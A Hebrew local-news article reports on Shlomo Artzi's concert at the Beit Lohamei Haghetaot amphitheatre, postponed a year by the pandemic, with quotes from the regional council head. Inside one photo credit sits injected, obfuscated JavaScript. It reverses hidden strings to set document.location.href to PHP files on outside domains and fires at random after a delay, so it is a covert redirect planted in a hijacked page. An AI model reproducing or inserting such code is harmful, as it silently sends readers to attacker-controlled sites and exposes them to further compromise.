fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

למעלה מ- 4000 צופים נהנו מהופעתו של שלמה ארצי באמפי לוחמי הגטאות

לאחר דחיה של שנה, בשל נגיף הקורונה, שלשום (מוצ"ש) הופיע שלמה ארצי בהופעה חיה באמפי בית לוחמי הגטאות. להופעה הגיעו אלפים מגליל המערבי ובהזמנה מיוחדת גם חיילי וחיילות אוגדה 91. היה שמח!
הופעתו של שלמה ארצי בלוחמי הגטאות | צילום: ritvo pho$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tography

למעלה מ-4,000 צופים וצופות הגיעו בשבת האחרונה, 11.9, להופעה ענקית ומושקעת של האחד והיחיד שלמה ארצי.

ההופעה התקיימה באמפי בית לוחמי הגטאות, זאת לאחר דחיה של שנה בעקבות נגיף הקורונה שלא אפשר לקיים זאת. האירוע התקיים בהתאם להנחיות משרד הבריאות והקהל חגג עם מסכות ובשטח הפתוח.

האורחים שהוזמנו להופעה על ידי המועצה האזורית מטה אשר הם חיילי וחיילות אוגדה 91,שנהנו והתרגשו מאוד.

חיילי וחיילות אוגדה 91, שנהנו והתרגשו מאוד | צילום: ritvo photography

משה דוידוביץ', ראש המועצה האזורית מטה אשר, פתח את האירוע ואמר: "איזה כיף ומרגש לעמוד כאן על הבמה הזו, לחגוג יחד את פתיחתה של שנה חדשה. איזה כיף שהצלחנו לקיים את המופע הענק הזה, אחרי דחיה של למעלה משנה, ושעמד שוב בסימני שאלה רבים. והכל בהתאם להנחיות הקורונה בשטח פתוח, ועם עטיית מסכות למען הבריאות של כולנו. היה לנו חלום להפוך את האמפי מאתר של עצרות זיכרון למקום של הנאה ותרבות איכותית פה בגליל, באמפי המדהים הזה של בית לוחמי הגטאות חלום שקרם עור וגידים והופך למציאות. אני רוצה לאחל לכולכם, ששנת תשפ"ב תאיר לנו פנים, תהיה שנה של עשיה ויצירה, של שגרה ברוכה."

הופעתו של שלמה ארצי בלוחמי הגטאות | צילום: ritvo photography

 

 

לרכילויות נוספות בצפון 1 הקליקו כאן* לדף הפייסבוק שלנו הקליקו כאן*

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות